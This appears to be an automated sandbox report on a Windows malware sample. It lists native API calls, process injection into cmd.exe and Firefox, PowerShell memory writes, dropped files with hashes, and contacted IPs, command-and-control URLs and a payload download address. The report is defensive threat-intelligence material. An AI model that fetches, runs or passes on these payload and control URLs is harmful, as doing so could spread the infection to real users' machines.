Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtAllocateVirtualMemory: Direct from: 0x76FD480C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtDelayExecution: Direct from: 0x76FD2CFC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQueryInformationProcess: Direct from: 0x76FD2B46	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtResumeThread: Direct from: 0x76FD2EDC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtOpenKeyEx: Direct from: 0x76FD2ABC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtReadFile: Direct from: 0x76FD29FC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQuerySystemInformation: Direct from: 0x76FD2D1C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtNotifyChangeKey: Direct from: 0x76FD3B4C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtSetInformationProcess: Direct from: 0x76FD2B7C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtMapViewOfSection: Direct from: 0x76FD2C3C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtAllocateVirtualMemory: Direct from: 0x76FD2B1C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtResumeThread: Direct from: 0x76FD35CC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtWriteVirtualMemory: Direct from: 0x76FD2D5C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtReadVirtualMemory: Direct from: 0x76FD2DAC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtSetInformationThread: Direct from: 0x76FC6319	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtOpenFile: Direct from: 0x76FD2CEC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtAllocateVirtualMemory: Direct from: 0x76FD3BBC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQueryInformationToken: Direct from: 0x76FD2BCC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtProtectVirtualMemory: Direct from: 0x76FC7A4E	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtAllocateVirtualMemory: Direct from: 0x76FD2B0C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtOpenSection: Direct from: 0x76FD2D2C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtCreateFile: Direct from: 0x76FD2F0C	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: NULL target: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Foremasthand.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Foremasthand.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
160.124.21.234	www.huatihui2.com	South Africa	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
219.94.128.41	n-benriya002.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	false
172.67.206.253	www.aneiina.top	United States	13335	CLOUDFLARENETUS	false
66.29.135.159	www.eternalsunrise.xyz	United States	19538	ADVANTAGECOMUS	true
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
37.48.104.133	nobel.rs	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
81.88.63.46	www.scwspark.com	Italy	39729	REGISTER-ASIT	false
217.160.0.183	www.jt-berger.store	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
109.70.148.57	klingerlumberltd.com	United Kingdom	25369	BANDWIDTH-ASGB	false
112.175.50.218	ejbodyart.com	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false

Name	Malicious	Antivirus Detection	Reputation
http://www.avolci.com/9pdo/?dzzh=OxSxCH&QtQ=z4EbQ/0+Z2zPU4/RVXslSAEzGqGuOzSPEXVlRRq2m+qj0dJnOgaQ/GbsoFonwncJq2LQE08kULao6+1QBSZUGJAxywljr6IstyX2fx3+/D27y0FPpkXVVLM=	false	Avira URL Cloud: safe	unknown
http://www.electra-airways.info/9pdo/?dzzh=OxSxCH&QtQ=3VEjKqPjJRFd1LEr7ftl6AeEjohVN1gCDcT03q/HcmbmUvzHTf5Gj5hvcK/QqTejry7alcBNCY2t4H+vJZJIHp8tocbCa9LgYeFrT1dxHygs+eIMLFxUj+8=	false	Avira URL Cloud: safe	unknown
http://www.eternalsunrise.xyz/9pdo/?dzzh=OxSxCH&QtQ=/vSyP1yVbm8RGq0e2H3CzkNsaOHJl/3MYALL4DCZeeN+d5B22Kt3zVmvOtiuNe7fMoA4lcLFRPd10Vr4k50RXoBd/BdrO+PNRq+sm2OxhUPGBDukAmwFGJM=	false	Avira URL Cloud: safe	unknown
http://www.avolci.com/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.klingerlumberltd.com/9pdo/	false	Avira URL Cloud: malware	unknown
http://www.huatihui2.com/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.aneiina.top/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.huatihui2.com/9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&dzzh=OxSxCH	false	Avira URL Cloud: safe	unknown
http://www.jt-berger.store/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.scwspark.com/9pdo/?QtQ=exLCvVI2E5RJM8xtzs0Xap+s8OiVQ9Xf+6d2cWgRCMmdoFVcUWazUq00e3zK6s54E+NAVH76kqhd1uh4f2sE6XSWR+uNBmxDzZmQYEOmQjbtsHV8VYB5rTQ=&dzzh=OxSxCH	false	Avira URL Cloud: safe	unknown
http://www.roundhaygardenscene.com/9pdo/	false	Avira URL Cloud: malware	unknown
http://www.klingerlumberltd.com/9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I=	false	Avira URL Cloud: malware	unknown
http://www.n-benriya002.com/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.roundhaygardenscene.com/9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH	false	Avira URL Cloud: malware	unknown
http://www.ejbodyart.com/9pdo/?dzzh=OxSxCH&QtQ=DnYaRovP48GzkkJrYMb+2fT4Pkhg/GvwuVP/6iFiedv+ORSC+0oTk/Gl1D7Kx2hOtjeczUyzMCTs4BuiBiMVlNIM74EOcC0w4I/7Krg2VTUnK1jygYdG7TE=	false	Avira URL Cloud: safe	unknown
http://www.n-benriya002.com/9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M+TEq7R0RTFMUOKmG2dqiBXhD8cCdAclTZkEAO29Celit1EFdRt8L6G9Xd5xqtutsMklg2OrtOvYk99njtWVeRq/fD9R4HBgWh9ZRW3T/b1Zn0KY=	false	Avira URL Cloud: safe	unknown
http://www.fraternize.org/9pdo/?QtQ=VHiI6b/PPIA+OuARKaswq4b959D7SkxlZx7zpnglo7qdO2KXbQcQ9KuRFrEQ+F9C9sgTMWbLOSxIFzstzFciu1MPjvyftGkFxn6hWuyxlTlwRkGEMIrwXeI=&dzzh=OxSxCH	false	Avira URL Cloud: safe	unknown
https://nobel.rs/FaZfCetBYix205.bin	false		high
http://www.huatihui2.com/9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&FJ0pD=Txf0EHJ0JZ	false	Avira URL Cloud: safe	unknown
http://www.fraternize.org/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.stevethatcher.com/9pdo/	false	Avira URL Cloud: malware	unknown
http://www.jt-berger.store/9pdo/?QtQ=9/X38tn9qLO2xSF02XBR/rEx8jnqUAkCRmtcXfkuabXCkgKRDBhcw5/s5NSemU/1fww/nV1egvBpaCqwFnie4syGBvlnyI6Zu2K3XALMlG8T/sDwKknxjFA=&dzzh=OxSxCH	false	Avira URL Cloud: safe	unknown
http://www.scwspark.com/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.electra-airways.info/9pdo/	false	Avira URL Cloud: safe	unknown
http://www.aneiina.top/9pdo/?QtQ=0DGTuA6y7M/wLSr0kneg8YEAwW66+S1tR7phNjB1U9UE4xiz+PGigUaE1dFUhjL1hYKynwQR5zkXwRTBrBJI0vMFkq8Tbe7pIeNuz9jCCKB2fjNWkoH785s=&dzzh=OxSxCH	false	Avira URL Cloud: safe	unknown
http://www.eternalsunrise.xyz/9pdo/	false	Avira URL Cloud: safe	unknown

Windows Analysis Report 2024_04_005.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
2024_04_005.exe

Malware Threat Intel
Provided by

ID:	1436120
Product:	CloudBasic
Start time:	20:22:43
Start date:	03.05.2024
Sample:	2024_04_005.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	26b36913a11d0056c0029d7cccc75460
SHA1:	80457e93a07706c318f4a3b8c55591d452694e29
SHA256:	b36c6a2443a47596fcd36f807f7376dc3c3bc869dd3b5d46495fd097b8494ee6
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\Templates\scramasaxe.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide	87F90D962C364E8CB7411F88A6FD7B04	D0DDD551E0929DF7424AA6B37D65C0547CF3AAA1	A0CF873647CB5EE40E963152480BAA6BC29750B492DC132F2C1F46CD86155EA6
C:\ProgramData\Skattetryk.ini	ASCII text, with CRLF line terminators	2AF617AD94342359A93DDB5D6938FBD6	EA311F6DCA0558E0C120226D7A3E0F83D179D39B	EC99A659D679A4A294E60F24C52991827C7647C8AFFBB597BA1A7AECA6F1ECDB
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	4C24412D4F060F4632C0BD68CC9ECB54	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
C:\Users\user\AppData\Local\Temp\545Ni1I	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7	24937DB267D854F3EF5453E2E54EA21B	F519A77A669D9F706D5D537A203B7245368D40CE	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
C:\Users\user\AppData\Local\Temp\Foremasthand.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	26B36913A11D0056C0029D7CCCC75460	80457E93A07706C318F4A3B8C55591D452694E29	B36C6A2443A47596FCD36F807F7376DC3C3BC869DD3B5D46495FD097B8494EE6
C:\Users\user\AppData\Local\Temp\Foremasthand.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2as3ofi5.au3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcctn0um.3y2.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\nspE03E.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D968CB2B98B83C03A9F02DD9B8DF97DC	D784C9B7A92DCE58A5038BEB62A48FF509E166A0	A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
C:\Users\user\AppData\Local\vinduers\languages\Dentinen\Uengageredes.Raa169	ASCII text, with very long lines (65536), with no line terminators	AB7FD4F045F2000D17F7FF637E6AFB7D	160BBE17B476A5D3AF7D340D4B6015F7DBA50161	13A34F9CF2F352F84EEA2CC84152196B81E441D0C677134D3A62A35C58078F91
C:\Users\user\AppData\Local\vinduers\languages\Odometer\Zodiacs\himlene.pin	data	5A07790673B83F17664F5CBB6603D002	3803C2BC1630C7BA59801D7236CF09E7A3D1E4F3	EC1FBD1062FED710302A86E6E3C0A3C9552DE69190C8EEC322BB99B065397EFE
C:\Users\user\AppData\Local\vinduers\languages\Udryddet.Hel	data	9C3EF614AF2037B013DA250AC9889DD9	AB50F666FFF7088562B9D8D3E528772FC8E3F3D7	6D7389DC157249ECCCC464F3DA4585E3BA6816ACD7AAD4E903D619CB9A5B27B7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\scramasaxe.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide	B1513B7592B00FB570B2A50194261FEB	6D1B607170CD88EAC0FFF7E2E5044C58F013606F	EC3AB4647048B99D3E7187E51261ED4D2F5EB13F70BB050325A6BB65FFA6F9FD
C:\Users\user\AppData\Roaming\Skattetryk.ini	ASCII text, with CRLF line terminators	2AF617AD94342359A93DDB5D6938FBD6	EA311F6DCA0558E0C120226D7A3E0F83D179D39B	EC99A659D679A4A294E60F24C52991827C7647C8AFFBB597BA1A7AECA6F1ECDB
C:\Users\user\Music\papirvgts.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide	156B9DABD147BACB26FA274091080390	242671D859275DE139E2B95E58BED67C56500DCB	5EEBFA14CA9342DBA59B41DDBA4952D39D61F74F071F1AC95BAA1D10FF525293
C:\Users\user\peniblere.ini	ASCII text, with CRLF line terminators	BE641EC91B4AA42297829400F502F482	C8173153CDE6279F7738664BB0B236E2023E59F9	4ED9BF5C25B67971005DBA11B782698B5FEC609069B4952310217FEFE3B0DE6A
C:\Users\Public\Music\papirvgts.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide	578E53603699AF3607491799B50F71E3	ED82E1543671AC72812F10A6429EE5AA91079C69	523CA2BC1EA41D4EE8976FAB8C04F39161FBC7B108A7942E2040669488BCC73E